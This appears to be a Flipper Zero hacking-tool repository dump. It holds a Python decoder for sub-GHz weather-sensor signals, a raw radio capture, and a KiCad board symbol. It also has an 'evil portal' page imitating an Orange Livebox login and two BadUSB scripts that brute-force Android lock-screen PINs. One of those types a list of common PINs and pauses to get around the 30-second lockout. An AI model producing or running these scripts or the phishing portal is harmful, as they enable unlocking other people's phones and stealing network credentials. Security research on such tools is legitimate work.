('data_finder.py -i ') 51 | sys.exit(2) 52 | for opt, arg in opts: 53 | if opt == '-h': 54 | print ('data_finder.py -i ') 55 | sys.exit() 56 | elif opt in ("-i", "--ifile"): 57 | inputfile = arg 58 | 59 | if __name__ == "__main__": 60 | main(sys.argv[1:]) 61 | 62 | 63 | content_file = '' 64 | 65 | count_line = 0 66 | 67 | with open(inputfile, "r") as fichier: 68 | for line in fichier: 69 | if count_line > 4: 70 | content_file += re.sub('RAW_Data: ','',line) 71 | 72 | else: 73 | count_line += 1 74 | 75 | 76 | content_file = re.sub(r'( -\d+ )',r'\1\n', content_file) 77 | 78 | f = open("temp.txt", "w") 79 | f.write(content_file) 80 | f.close() 81 | 82 | list_of_nexus_th_data = [] 83 | 84 | 85 | count_bit = 0 86 | ready_to_nexus_packet = False 87 | current_packet_nexus = [] 88 | 89 | with open('temp.txt', "r") as fichier: 90 | for line in fichier: 91 | line = line.split(' ') 92 | nexus_time = int(line[1]) 93 | 94 | # on cherche le début du packet de nexus TH 95 | if int(nexus_time) < -3500 and int(nexus_time) > -4200: 96 | #print(line[1]) 97 | ready_to_nexus_packet = True 98 | elif ready_to_nexus_packet == True and count_bit < 36: 99 | if nexus_time < -1900: 100 | current_packet_nexus.append("1") 101 | else: 102 | current_packet_nexus.append("0") 103 | count_bit += 1 104 | elif count_bit == 36: 105 | raw_data_to_human_readable(current_packet_nexus) 106 | list_of_nexus_th_data.append( current_packet_nexus ) 107 | count_bit = 0 108 | ready_to_nexus_packet = False 109 | -------------------------------------------------------------------------------- /wifi/evil_portal/orange.html: -------------------------------------------------------------------------------- 1 | 5 |

    Livebox
    -------------------------------------------------------------------------------- /badusb/android/pin_brute_force/tab_1000_delay_4_digit_pin_bf_test.txt: -------------------------------------------------------------------------------- 1 | REM fichier de test de touche badkb pour le flipperzero 2 | 3 | 4 | DELAY 1000 5 | STRING 4 6 | DELAY 500 7 | STRING 3 8 | DELAY 500 9 | STRING 2 10 | DELAY 500 11 | STRING 1 12 | 13 | DELAY 1000 14 | ENTER 15 | DELAY 500 16 | 17 | TAB 18 | DELAY 500 19 | TAB 20 | DELAY 500 21 | TAB 22 | DELAY 500 23 | TAB 24 | DELAY 500 25 | TAB 26 | DELAY 500 27 | TAB 28 | DELAY 500 29 | TAB 30 | DELAY 500 31 | TAB 32 | DELAY 500 33 | TAB 34 | DELAY 500 35 | 36 | 37 | DELAY 1500 38 | STRING 1 39 | DELAY 500 40 | STRING 1 41 | DELAY 500 42 | STRING 1 43 | DELAY 500 44 | STRING 1 45 | DELAY 1000 46 | ENTER 47 | DELAY 500 48 | 49 | TAB 50 | DELAY 500 51 | TAB 52 | DELAY 500 53 | TAB 54 | DELAY 500 55 | TAB 56 | DELAY 500 57 | TAB 58 | DELAY 500 59 | TAB 60 | DELAY 500 61 | TAB 62 | DELAY 500 63 | TAB 64 | DELAY 500 65 | TAB 66 | DELAY 500 67 | 68 | 69 | 70 | DELAY 1000 71 | STRING 2 72 | DELAY 500 73 | STRING 2 74 | DELAY 500 75 | STRING 2 76 | DELAY 500 77 | STRING 2 78 | DELAY 1000 79 | ENTER 80 | DELAY 500 81 | 82 | TAB 83 | DELAY 500 84 | TAB 85 | DELAY 500 86 | TAB 87 | DELAY 500 88 | TAB 89 | DELAY 500 90 | TAB 91 | DELAY 500 92 | TAB 93 | DELAY 500 94 | TAB 95 | DELAY 500 96 | TAB 97 | DELAY 500 98 | TAB 99 | DELAY 500 100 | 101 | 102 | DELAY 1000 103 | STRING 3 104 | DELAY 500 105 | STRING 3 106 | DELAY 500 107 | STRING 3 108 | DELAY 500 109 | STRING 3 110 | DELAY 1000 111 | ENTER 112 | DELAY 500 113 | 114 | TAB 115 | DELAY 500 116 | TAB 117 | DELAY 500 118 | TAB 119 | DELAY 500 120 | TAB 121 | DELAY 500 122 | TAB 123 | DELAY 500 124 | TAB 125 | DELAY 500 126 | TAB 127 | DELAY 500 128 | TAB 129 | DELAY 500 130 | TAB 131 | DELAY 500 132 | 133 | 134 | 135 | DELAY 1500 136 | STRING 5 137 | DELAY 500 138 | STRING 5 139 | DELAY 500 140 | STRING 5 141 | DELAY 500 142 | STRING 5 143 | DELAY 1000 144 | ENTER 145 | DELAY 500 146 | 147 | REM On va se placer sur le chiffre 1 pour garder le focus 148 | TAB 149 | DELAY 500 150 | TAB 151 | DELAY 500 152 | TAB 153 | DELAY 500 154 | TAB 155 | DELAY 500 156 | TAB 157 | DELAY 500 158 | TAB 159 | DELAY 500 160 | TAB 161 | DELAY 500 162 | TAB 163 | DELAY 500 164 | TAB 165 | DELAY 500 166 | 167 | ENTER 168 | DELAY 500 169 | ENTER 170 | DELAY 500 171 | ENTER 172 | DELAY 500 173 | ENTER 174 | DELAY 500 175 | ENTER 176 | DELAY 500 177 | ENTER 178 | DELAY 500 179 | ENTER 180 | DELAY 500 181 | ENTER 182 | DELAY 500 183 | ENTER 184 | DELAY 500 185 | ENTER 186 | DELAY 500 187 | ENTER 188 | DELAY 500 189 | ENTER 190 | DELAY 500 191 | ENTER 192 | DELAY 500 193 | ENTER 194 | DELAY 500 195 | ENTER 196 | DELAY 500 197 | ENTER 198 | DELAY 500 199 | ENTER 200 | DELAY 500 201 | ENTER 202 | DELAY 500 203 | ENTER 204 | DELAY 500 205 | ENTER 206 | DELAY 500 207 | ENTER 208 | DELAY 500 209 | ENTER 210 | DELAY 500 211 | ENTER 212 | DELAY 500 213 | ENTER 214 | DELAY 500 215 | ENTER 216 | DELAY 500 217 | ENTER 218 | DELAY 500 219 | ENTER 220 | DELAY 500 221 | ENTER 222 | DELAY 500 223 | ENTER 224 | DELAY 500 225 | ENTER 226 | DELAY 500 227 | ENTER 228 | DELAY 500 229 | ENTER 230 | DELAY 500 231 | ENTER 232 | DELAY 500 233 | ENTER 234 | DELAY 500 235 | ENTER 236 | DELAY 500 237 | ENTER 238 | DELAY 500 239 | ENTER 240 | DELAY 500 241 | ENTER 242 | DELAY 500 243 | ENTER 244 | DELAY 500 245 | ENTER 246 | DELAY 500 247 | ENTER 248 | DELAY 500 249 | ENTER 250 | DELAY 500 251 | ENTER 252 | DELAY 500 253 | ENTER 254 | DELAY 500 255 | ENTER 256 | DELAY 500 257 | DELAY 500 258 | 259 | 260 | REM On va se replacer sur la zone de saisie 261 | UP 262 | 263 | DELAY 500 264 | STRING 4 265 | DELAY 500 266 | STRING 4 267 | DELAY 500 268 | STRING 4 269 | DELAY 500 270 | STRING 4 271 | DELAY 500 272 | ENTER 273 | DELAY 500 274 | 275 | TAB 276 | DELAY 500 277 | TAB 278 | DELAY 500 279 | TAB 280 | DELAY 500 281 | TAB 282 | DELAY 500 283 | TAB 284 | DELAY 500 285 | TAB 286 | DELAY 500 287 | TAB 288 | DELAY 500 289 | TAB 290 | DELAY 500 291 | TAB 292 | DELAY 500 293 | 294 | 295 | DELAY 500 296 | STRING 1 297 | DELAY 500 298 | STRING 2 299 | DELAY 500 300 | STRING 3 301 | DELAY 500 302 | STRING 4 303 | DELAY 500 304 | ENTER 305 | DELAY 500 306 | 307 | TAB 308 | DELAY 500 309 | TAB 310 | DELAY 500 311 | TAB 312 | DELAY 500 313 | TAB 314 | DELAY 500 315 | TAB 316 | DELAY 500 317 | TAB 318 | DELAY 500 319 | TAB 320 | DELAY 500 321 | TAB 322 | DELAY 500 323 | TAB 324 | DELAY 500 325 | 326 | 327 | DELAY 1000 328 | STRING 6666 329 | DELAY 1000 330 | ENTER 331 | DELAY 500 332 | 333 | TAB 334 | DELAY 500 335 | TAB 336 | DELAY 500 337 | TAB 338 | DELAY 500 339 | TAB 340 | DELAY 500 341 | TAB 342 | DELAY 500 343 | TAB 344 | DELAY 500 345 | TAB 346 | DELAY 500 347 | TAB 348 | DELAY 500 349 | TAB 350 | DELAY 500 351 | 352 | 353 | DELAY 1000 354 | STRING 7777 355 | DELAY 1000 356 | ENTER 357 | DELAY 500 358 | 359 | TAB 360 | DELAY 500 361 | TAB 362 | DELAY 500 363 | TAB 364 | DELAY 500 365 | TAB 366 | DELAY 500 367 | TAB 368 | DELAY 500 369 | TAB 370 | DELAY 500 371 | TAB 372 | DELAY 500 373 | TAB 374 | DELAY 500 375 | TAB 376 | DELAY 500 377 | 378 | 379 | DELAY 1000 380 | STRING 8888 381 | DELAY 1000 382 | ENTER 383 | DELAY 500 384 | 385 | TAB 386 | DELAY 500 387 | TAB 388 | DELAY 500 389 | TAB 390 | DELAY 500 391 | TAB 392 | DELAY 500 393 | TAB 394 | DELAY 500 395 | TAB 396 | DELAY 500 397 | TAB 398 | DELAY 500 399 | TAB 400 | DELAY 500 401 | TAB 402 | DELAY 500 403 | 404 | -------------------------------------------------------------------------------- /subghz/nexus-th/Vi_u.sub: -------------------------------------------------------------------------------- 1 | Filetype: Flipper SubGhz RAW File 2 | Version: 1 3 | Frequency: 433920000 4 | Preset: FuriHalSubGhzPresetOok650Async 5 | Protocol: RAW 6 | RAW_Data: 957 -14254 65 -198 165 -200 165 -696 10927 -12634 97 -68 65 -2570 97 -1084 397 -98 491 -98 297 -96 423 -1040 449 -1042 449 -2012 489 -1012 481 -2004 479 -1020 481 -1012 487 -2010 483 -3990 527 -1018 479 -2000 515 -1008 485 -1010 481 -1980 489 -1008 481 -1022 477 -1992 507 -1968 517 -988 479 -1006 505 -986 505 -1016 467 -1010 505 -1000 471 -1018 515 -1992 489 -1996 483 -1006 481 -986 517 -1988 461 -1006 507 -1972 471 -1042 499 -1972 503 -1980 481 -1996 481 -1992 487 -1006 479 -1018 479 -1968 519 -994 513 -2002 477 -1008 487 -1008 481 -1980 509 -3992 541 -996 481 -1998 487 -1002 479 -1010 483 -1994 491 -1010 481 -1020 477 -2004 481 -2012 477 -984 511 -1012 459 -1040 479 -984 511 -1008 471 -1030 487 -996 515 -2000 477 -1998 447 -1020 481 -1022 477 -1992 483 -1000 515 -1966 481 -1034 483 -2006 471 -2004 481 -1980 505 -1970 473 -1010 491 -1008 473 -2000 481 -1018 513 -1998 475 -1006 489 -1008 479 -2010 511 -3974 503 -984 511 -1970 483 -1018 479 -1006 503 -1962 509 -1016 479 -1006 471 -2014 485 -2000 471 -1016 505 -978 505 -1004 487 -1020 477 -1016 479 -1012 489 -1008 513 -1988 457 -2012 481 -1006 473 -1016 481 -2010 471 -1000 515 -1948 505 -1020 511 -1988 459 -2012 479 -1972 483 -2016 461 -1008 503 -980 511 -1966 515 -990 513 -2002 475 -1008 487 -1004 473 -2004 517 -3980 505 -984 511 -1970 483 -1020 481 -1008 471 -2010 487 -1006 475 -1014 503 -1978 513 -1970 513 -1002 487 -1008 481 -988 513 -1008 485 -1010 483 -1018 483 -992 513 -1998 471 -1980 479 -1014 497 -1016 469 -2004 475 -1004 491 -2002 477 -1004 523 -1972 487 -1976 483 -2012 485 -1968 483 -1000 517 -1010 483 -1976 491 -1010 511 -1970 515 -990 481 -1008 485 -1990 529 -3994 499 -1022 479 -1994 483 -998 483 -1042 447 -2012 487 -1010 481 -988 513 -1966 519 -1978 507 -1012 475 -1006 473 -1028 481 -998 481 -1042 447 -1020 481 -1022 515 -1970 511 -1966 485 -1034 483 -990 481 -1994 481 -998 517 -1966 481 -1034 519 -1972 473 -2004 481 -1982 501 -1972 475 -1004 493 -1006 479 -2006 479 -1016 511 -1970 481 -1034 487 -1008 481 -1974 529 -3988 501 -980 511 -1968 483 -1020 479 -1032 473 -1978 503 -978 509 -1006 471 -1994 527 -1974 469 -1042 463 -1014 479 -1014 503 -984 509 -978 509 -1008 471 -1032 521 -1968 487 -1982 481 -1010 483 -1020 479 -1976 497 -1016 469 -2006 473 -1008 527 -1968 501 -1976 479 -2008 477 -1974 501 -1014 467 -1010 479 -2010 479 -1018 513 -1964 513 -974 515 -1008 483 -1982 505 -3998 537 -992 481 -2000 481 -998 481 -1010 483 -1994 491 -1008 475 -1014 503 -1972 515 -2002 479 -1004 487 -1004 475 -1014 503 -1008 477 -1016 7 | RAW_Data: 481 -1012 459 -1052 509 -1956 497 -1976 507 -1010 471 -1022 479 -1974 487 -1016 489 -1964 503 -1016 503 -1976 499 -1976 479 -2006 477 -1978 503 -1020 477 -982 511 -1964 485 -1020 513 -1998 475 -1010 493 -1006 473 -2004 515 -3976 541 -992 483 -1996 489 -1002 481 -1008 485 -1992 491 -1010 481 -1016 473 -2012 511 -1968 481 -1028 485 -1008 481 -1022 479 -1004 489 -1008 481 -1018 483 -992 517 -2002 477 -1968 481 -1032 471 -1018 501 -1966 471 -1040 477 -1974 487 -1016 523 -1970 485 -2012 447 -2010 487 -1968 481 -1038 485 -1008 481 -1974 491 -1006 507 -1992 487 -1004 481 -1008 481 -2012 525 -3986 497 -1022 481 -2002 483 -996 481 -1006 485 -1994 505 -978 511 -1008 471 -2008 485 -2004 475 -1004 493 -1008 479 -1018 469 -1012 493 -1010 479 -1016 473 -1020 543 -1954 497 -1974 477 -1016 499 -1010 469 -1998 471 -1008 507 -1974 501 -1014 499 -1974 499 -1976 513 -1970 481 -1970 503 -1022 477 -1016 477 -1972 515 -990 515 -1970 511 -1006 485 -1008 481 -157340 65 -830 131 -132 133 -898 131 -166 133 -1826 329 -66 131 -134 263 -134 265 -100 331 -166 1825 -98 14409 -14288 133 -100 97 -658 497 -198 461 -198 325 -100 163 -130 2179 -12808 261 -166 163 -130 65 -724 129 -232 65 -264 97 -66 131 -262 65 -328 65 -396 297 -98 327 -98 163 -98 229 -132 623 -100 1325 -64 3549 -12000 97 -130 65 -1052 131 -260 227 -130 1489 -132 133 -166 1027 -100 18767 -13146 165 -3256 199 -166 165 -66 267 -466 231 -528 14783 -12480 99 -294 65 -3562 527 -66 133 -334 233 -198 67 -66 297 -298 1159 -132 5959 -16328 65 -234 67 -100 659 -66 227 -522 1391 -15180 63 -2020 67 -2280 695 -66 365 -166 231 -298 2319 -12138 99 -4274 65 -100 297 -168 365 -132 299 -100 429 -66 1597 -100 1965 -14982 133 -134 265 -266 97 -100 197 -232 627 -100 131 -100 799 -68 65 -68 861 -64 15763 -12128 99 -66 99 -1122 99 -334 65 -1562 65 -756 657 -66 67 -168 497 -132 65 -232 1969 -68 14175 -12568 65 -132 295 -560 99 -66 229 -66 327 -66 261 -130 18497 -14530 197 -592 163 -98 163 -658 397 -196 195 -132 363 -790 99 -66 293 -13240 197 -2436 195 -132 65 -98 361 -132 131 -100 301 -400 199 -68 1831 -98 427 -12782 97 -360 195 -196 65 -232 299 -66 265 -200 295 -696 265 -198 593 -164 263 -198 1081 -12086 99 -1586 65 -296 97 -132 755 -164 763 -100 27601 -12916 99 -130 97 -3828 461 -66 263 -164 2669 -13576 65 -2306 65 -622 233 -100 99 -362 97 -330 293 -134 165 -100 261 -132 26051 -12538 65 -566 99 -302 99 -830 131 -500 367 -66 131 -466 593 -68 397 -66 8 | RAW_Data: 429 -198 693 -66 15353 -10414 165 -134 99 -266 331 -232 99 -298 65 -98 497 -164 99 -300 331 -102 199 -66 199 -232 1249 -66 5801 -13016 99 -366 67 -2888 97 -196 361 -298 31521 -12358 457 -266 633 -166 131 -132 527 -264 197 -162 131 -132 197 -296 829 -66 229 -66 855 -64 7727 -10332 65 -566 265 -234 167 -430 65 -230 493 -166 97 -164 295 -132 99 -262 463 -66 629 -98 2315 -16028 99 -762 99 -566 457 -166 65 -166 133 -266 265 -332 365 -166 4255 -12116 99 -758 463 -132 65 -426 65 -890 97 -328 65 -196 97 -362 65 -166 589 -132 195 -198 261 -166 659 -98 335 -15660 63 -66 131 -1328 97 -1098 163 -932 295 -270 297 -168 297 -68 167 -100 165 -434 527 -66 163 -15266 67 -662 165 -1924 131 -198 97 -890 67 -130 327 -100 293 -132 423 -66 5595 -12982 65 -766 9 | -------------------------------------------------------------------------------- /pcb/bw16/devkit/bw16_dev_kit_symbole.kicad_sym: -------------------------------------------------------------------------------- 1 | (kicad_symbol_lib 2 | (version 20231120) 3 | (generator "kicad_symbol_editor") 4 | (generator_version "8.0") 5 | (symbol "BW16_dev_kit" 6 | (exclude_from_sim no) 7 | (in_bom yes) 8 | (on_board yes) 9 | (property "Reference" "U" 10 | (at 0 0 0) 11 | (effects 12 | (font 13 | (size 1.27 1.27) 14 | ) 15 | ) 16 | ) 17 | (property "Value" "" 18 | (at 0 0 0) 19 | (effects 20 | (font 21 | (size 1.27 1.27) 22 | ) 23 | ) 24 | ) 25 | (property "Footprint" "" 26 | (at 0 0 0) 27 | (effects 28 | (font 29 | (size 1.27 1.27) 30 | ) 31 | (hide yes) 32 | ) 33 | ) 34 | (property "Datasheet" "" 35 | (at 0 0 0) 36 | (effects 37 | (font 38 | (size 1.27 1.27) 39 | ) 40 | (hide yes) 41 | ) 42 | ) 43 | (property "Description" "" 44 | (at 0 0 0) 45 | (effects 46 | (font 47 | (size 1.27 1.27) 48 | ) 49 | (hide yes) 50 | ) 51 | ) 52 | (symbol "BW16_dev_kit_0_1" 53 | (rectangle 54 | (start -12.7 5.08) 55 | (end 13.97 -30.48) 56 | (stroke 57 | (width 0) 58 | (type default) 59 | ) 60 | (fill 61 | (type none) 62 | ) 63 | ) 64 | ) 65 | (symbol "BW16_dev_kit_1_1" 66 | (pin power_out line 67 | (at 11.43 1.27 0) 68 | (length 2.54) 69 | (name "GND" 70 | (effects 71 | (font 72 | (size 1.27 1.27) 73 | ) 74 | ) 75 | ) 76 | (number "1" 77 | (effects 78 | (font 79 | (size 1.27 1.27) 80 | ) 81 | ) 82 | ) 83 | ) 84 | (pin power_in line 85 | (at 11.43 -21.59 0) 86 | (length 2.54) 87 | (name "3V3" 88 | (effects 89 | (font 90 | (size 1.27 1.27) 91 | ) 92 | ) 93 | ) 94 | (number "10" 95 | (effects 96 | (font 97 | (size 1.27 1.27) 98 | ) 99 | ) 100 | ) 101 | ) 102 | (pin power_in line 103 | (at 11.43 -24.13 0) 104 | (length 2.54) 105 | (name "5V" 106 | (effects 107 | (font 108 | (size 1.27 1.27) 109 | ) 110 | ) 111 | ) 112 | (number "11" 113 | (effects 114 | (font 115 | (size 1.27 1.27) 116 | ) 117 | ) 118 | ) 119 | ) 120 | (pin power_out line 121 | (at -10.16 1.27 180) 122 | (length 2.54) 123 | (name "GND" 124 | (effects 125 | (font 126 | (size 1.27 1.27) 127 | ) 128 | ) 129 | ) 130 | (number "12" 131 | (effects 132 | (font 133 | (size 1.27 1.27) 134 | ) 135 | ) 136 | ) 137 | ) 138 | (pin input line 139 | (at -10.16 -1.27 180) 140 | (length 2.54) 141 | (name "PA30" 142 | (effects 143 | (font 144 | (size 1.27 1.27) 145 | ) 146 | ) 147 | ) 148 | (number "13" 149 | (effects 150 | (font 151 | (size 1.27 1.27) 152 | ) 153 | ) 154 | ) 155 | ) 156 | (pin input line 157 | (at -10.16 -3.81 180) 158 | (length 2.54) 159 | (name "PA27" 160 | (effects 161 | (font 162 | (size 1.27 1.27) 163 | ) 164 | ) 165 | ) 166 | (number "14" 167 | (effects 168 | (font 169 | (size 1.27 1.27) 170 | ) 171 | ) 172 | ) 173 | ) 174 | (pin input line 175 | (at -10.16 -6.35 180) 176 | (length 2.54) 177 | (name "PA25" 178 | (effects 179 | (font 180 | (size 1.27 1.27) 181 | ) 182 | ) 183 | ) 184 | (number "15" 185 | (effects 186 | (font 187 | (size 1.27 1.27) 188 | ) 189 | ) 190 | ) 191 | ) 192 | (pin input line 193 | (at -10.16 -8.89 180) 194 | (length 2.54) 195 | (name "PA26" 196 | (effects 197 | (font 198 | (size 1.27 1.27) 199 | ) 200 | ) 201 | ) 202 | (number "16" 203 | (effects 204 | (font 205 | (size 1.27 1.27) 206 | ) 207 | ) 208 | ) 209 | ) 210 | (pin input line 211 | (at -10.16 -11.43 180) 212 | (length 2.54) 213 | (name "PA8" 214 | (effects 215 | (font 216 | (size 1.27 1.27) 217 | ) 218 | ) 219 | ) 220 | (number "17" 221 | (effects 222 | (font 223 | (size 1.27 1.27) 224 | ) 225 | ) 226 | ) 227 | ) 228 | (pin input line 229 | (at -10.16 -13.97 180) 230 | (length 2.54) 231 | (name "PA7" 232 | (effects 233 | (font 234 | (size 1.27 1.27) 235 | ) 236 | ) 237 | ) 238 | (number "18" 239 | (effects 240 | (font 241 | (size 1.27 1.27) 242 | ) 243 | ) 244 | ) 245 | ) 246 | (pin input line 247 | (at -10.16 -16.51 180) 248 | (length 2.54) 249 | (name "EN" 250 | (effects 251 | (font 252 | (size 1.27 1.27) 253 | ) 254 | ) 255 | ) 256 | (number "19" 257 | (effects 258 | (font 259 | (size 1.27 1.27) 260 | ) 261 | ) 262 | ) 263 | ) 264 | (pin input line 265 | (at 11.43 -1.27 0) 266 | (length 2.54) 267 | (name "PA15" 268 | (effects 269 | (font 270 | (size 1.27 1.27) 271 | ) 272 | ) 273 | ) 274 | (number "2" 275 | (effects 276 | (font 277 | (size 1.27 1.27) 278 | ) 279 | ) 280 | ) 281 | ) 282 | (pin power_out line 283 | (at -10.16 -19.05 180) 284 | (length 2.54) 285 | (name "GND" 286 | (effects 287 | (font 288 | (size 1.27 1.27) 289 | ) 290 | ) 291 | ) 292 | (number "20" 293 | (effects 294 | (font 295 | (size 1.27 1.27) 296 | ) 297 | ) 298 | ) 299 | ) 300 | (pin power_in line 301 | (at -10.16 -21.59 180) 302 | (length 2.54) 303 | (name "3V3" 304 | (effects 305 | (font 306 | (size 1.27 1.27) 307 | ) 308 | ) 309 | ) 310 | (number "21" 311 | (effects 312 | (font 313 | (size 1.27 1.27) 314 | ) 315 | ) 316 | ) 317 | ) 318 | (pin power_in line 319 | (at -10.16 -24.13 180) 320 | (length 2.54) 321 | (name "5V" 322 | (effects 323 | (font 324 | (size 1.27 1.27) 325 | ) 326 | ) 327 | ) 328 | (number "22" 329 | (effects 330 | (font 331 | (size 1.27 1.27) 332 | ) 333 | ) 334 | ) 335 | ) 336 | (pin input line 337 | (at 11.43 -3.81 0) 338 | (length 2.54) 339 | (name "PA14" 340 | (effects 341 | (font 342 | (size 1.27 1.27) 343 | ) 344 | ) 345 | ) 346 | (number "3" 347 | (effects 348 | (font 349 | (size 1.27 1.27) 350 | ) 351 | ) 352 | ) 353 | ) 354 | (pin input line 355 | (at 11.43 -6.35 0) 356 | (length 2.54) 357 | (name "PA13" 358 | (effects 359 | (font 360 | (size 1.27 1.27) 361 | ) 362 | ) 363 | ) 364 | (number "4" 365 | (effects 366 | (font 367 | (size 1.27 1.27) 368 | ) 369 | ) 370 | ) 371 | ) 372 | (pin input line 373 | (at 11.43 -8.89 0) 374 | (length 2.54) 375 | (name "PA12" 376 | (effects 377 | (font 378 | (size 1.27 1.27) 379 | ) 380 | ) 381 | ) 382 | (number "5" 383 | (effects 384 | (font 385 | (size 1.27 1.27) 386 | ) 387 | ) 388 | ) 389 | ) 390 | (pin input line 391 | (at 11.43 -11.43 0) 392 | (length 2.54) 393 | (name "PB3" 394 | (effects 395 | (font 396 | (size 1.27 1.27) 397 | ) 398 | ) 399 | ) 400 | (number "6" 401 | (effects 402 | (font 403 | (size 1.27 1.27) 404 | ) 405 | ) 406 | ) 407 | ) 408 | (pin input line 409 | (at 11.43 -13.97 0) 410 | (length 2.54) 411 | (name "PB2" 412 | (effects 413 | (font 414 | (size 1.27 1.27) 415 | ) 416 | ) 417 | ) 418 | (number "7" 419 | (effects 420 | (font 421 | (size 1.27 1.27) 422 | ) 423 | ) 424 | ) 425 | ) 426 | (pin input line 427 | (at 11.43 -16.51 0) 428 | (length 2.54) 429 | (name "PB1" 430 | (effects 431 | (font 432 | (size 1.27 1.27) 433 | ) 434 | ) 435 | ) 436 | (number "8" 437 | (effects 438 | (font 439 | (size 1.27 1.27) 440 | ) 441 | ) 442 | ) 443 | ) 444 | (pin power_out line 445 | (at 11.43 -19.05 0) 446 | (length 2.54) 447 | (name "GND" 448 | (effects 449 | (font 450 | (size 1.27 1.27) 451 | ) 452 | ) 453 | ) 454 | (number "9" 455 | (effects 456 | (font 457 | (size 1.27 1.27) 458 | ) 459 | ) 460 | ) 461 | ) 462 | ) 463 | ) 464 | ) 465 | -------------------------------------------------------------------------------- /badusb/android/pin_brute_force/top65_4digit_pin_bf.txt: -------------------------------------------------------------------------------- 1 | REM Android Password Brute Force - 4 digit pin 2 | REM Every 5th attempt the retry waits to work around the 30s timeout Android implements after 5 failed login attempts 3 | REM Uncomment bottom of script for DOB options 4 | REM Average completion time of script is 12m 5 | REM An exhaustive wordlist is not used because A) it is not assumed device has healthy battery B) time/power constraints of healthy battery 6 | REM Tested on Android 4.4 7 | REM Author: defplex.wordpress.com 8 | REM Modified for Flipper Zero by rf-bandit 9 | REM ***USE AT OWN RISK*** 10 | 11 | REM top 65 common pins 12 | 13 | 14 | DELAY 500 15 | STRING 4321 16 | DELAY 500 17 | DELAY 500 18 | STRING 1111 19 | DELAY 500 20 | GUI ENTER 21 | DELAY 500 22 | STRING 2222 23 | DELAY 500 24 | GUI ENTER 25 | DELAY 500 26 | STRING 3333 27 | DELAY 500 28 | GUI ENTER 29 | DELAY 500 30 | STRING 1234 31 | DELAY 500 32 | GUI ENTER 33 | DELAY 31000 34 | 35 | DELAY 500 36 | STRING 4444 37 | DELAY 500 38 | ENTER 39 | DELAY 500 40 | STRING 5555 41 | DELAY 500 42 | ENTER 43 | DELAY 500 44 | STRING 6666 45 | DELAY 500 46 | ENTER 47 | DELAY 500 48 | STRING 7777 49 | DELAY 500 50 | ENTER 51 | DELAY 500 52 | STRING 8888 53 | DELAY 500 54 | ENTER 55 | DELAY 500 56 | STRING x 57 | DELAY 500 58 | ENTER 59 | DELAY 31000 60 | 61 | DELAY 500 62 | STRING 9999 63 | DELAY 500 64 | ENTER 65 | DELAY 500 66 | STRING 1212 67 | DELAY 500 68 | ENTER 69 | DELAY 500 70 | STRING 1004 71 | DELAY 500 72 | ENTER 73 | DELAY 500 74 | STRING 2000 75 | DELAY 500 76 | ENTER 77 | DELAY 500 78 | STRING 6969 79 | DELAY 500 80 | ENTER 81 | DELAY 500 82 | STRING x 83 | DELAY 500 84 | ENTER 85 | DELAY 31000 86 | 87 | DELAY 500 88 | STRING 1122 89 | DELAY 500 90 | ENTER 91 | DELAY 500 92 | STRING 1313 93 | DELAY 500 94 | ENTER 95 | DELAY 500 96 | STRING 0000 97 | DELAY 500 98 | ENTER 99 | DELAY 500 100 | STRING 2001 101 | DELAY 500 102 | ENTER 103 | DELAY 500 104 | STRING 1010 105 | DELAY 500 106 | ENTER 107 | DELAY 500 108 | STRING x 109 | DELAY 500 110 | ENTER 111 | DELAY 31000 112 | 113 | DELAY 500 114 | STRING 2580 115 | DELAY 500 116 | ENTER 117 | DELAY 500 118 | STRING 1818 119 | DELAY 500 120 | ENTER 121 | DELAY 500 122 | STRING 1230 123 | DELAY 500 124 | ENTER 125 | DELAY 500 126 | STRING 1984 127 | DELAY 500 128 | ENTER 129 | DELAY 500 130 | STRING 1986 131 | DELAY 500 132 | ENTER 133 | DELAY 500 134 | STRING x 135 | DELAY 500 136 | ENTER 137 | DELAY 31000 138 | 139 | DELAY 500 140 | STRING 1985 141 | DELAY 500 142 | ENTER 143 | DELAY 500 144 | STRING 1000 145 | DELAY 500 146 | ENTER 147 | DELAY 500 148 | STRING 1231 149 | DELAY 500 150 | ENTER 151 | DELAY 500 152 | STRING 1987 153 | DELAY 500 154 | ENTER 155 | DELAY 500 156 | STRING 1999 157 | DELAY 500 158 | ENTER 159 | DELAY 500 160 | STRING x 161 | DELAY 500 162 | ENTER 163 | DELAY 31000 164 | 165 | DELAY 500 166 | STRING 2468 167 | DELAY 500 168 | ENTER 169 | DELAY 500 170 | STRING 2002 171 | DELAY 500 172 | ENTER 173 | DELAY 500 174 | STRING 2323 175 | DELAY 500 176 | ENTER 177 | DELAY 500 178 | STRING 1123 179 | DELAY 500 180 | ENTER 181 | DELAY 500 182 | STRING 1233 183 | DELAY 500 184 | ENTER 185 | DELAY 500 186 | STRING x 187 | DELAY 500 188 | ENTER 189 | DELAY 31000 190 | 191 | DELAY 500 192 | STRING 1357 193 | DELAY 500 194 | ENTER 195 | DELAY 500 196 | STRING 1221 197 | DELAY 500 198 | ENTER 199 | DELAY 500 200 | STRING 1324 201 | DELAY 500 202 | ENTER 203 | DELAY 500 204 | STRING 1988 205 | DELAY 500 206 | ENTER 207 | DELAY 500 208 | STRING 2112 209 | DELAY 500 210 | ENTER 211 | DELAY 500 212 | STRING x 213 | DELAY 500 214 | ENTER 215 | DELAY 31000 216 | 217 | DELAY 500 218 | STRING 1004 219 | DELAY 500 220 | ENTER 221 | DELAY 500 222 | STRING 2021 223 | DELAY 500 224 | ENTER 225 | DELAY 500 226 | STRING 5150 227 | DELAY 500 228 | ENTER 229 | DELAY 500 230 | STRING 1024 231 | DELAY 500 232 | ENTER 233 | DELAY 500 234 | STRING 1112 235 | DELAY 500 236 | ENTER 237 | DELAY 500 238 | STRING x 239 | DELAY 500 240 | ENTER 241 | DELAY 31000 242 | 243 | DELAY 500 244 | STRING 1004 245 | DELAY 500 246 | ENTER 247 | DELAY 500 248 | STRING 2021 249 | DELAY 500 250 | ENTER 251 | DELAY 500 252 | STRING 5150 253 | DELAY 500 254 | ENTER 255 | DELAY 500 256 | STRING 1024 257 | DELAY 500 258 | ENTER 259 | DELAY 500 260 | STRING 1112 261 | DELAY 500 262 | ENTER 263 | DELAY 500 264 | STRING x 265 | DELAY 500 266 | ENTER 267 | DELAY 31000 268 | 269 | DELAY 500 270 | STRING 1224 271 | DELAY 500 272 | ENTER 273 | DELAY 500 274 | STRING 1969 275 | DELAY 500 276 | ENTER 277 | DELAY 500 278 | STRING 1225 279 | DELAY 500 280 | ENTER 281 | DELAY 500 282 | STRING 1235 283 | DELAY 500 284 | ENTER 285 | DELAY 500 286 | STRING 1982 287 | DELAY 500 288 | ENTER 289 | DELAY 500 290 | STRING x 291 | DELAY 500 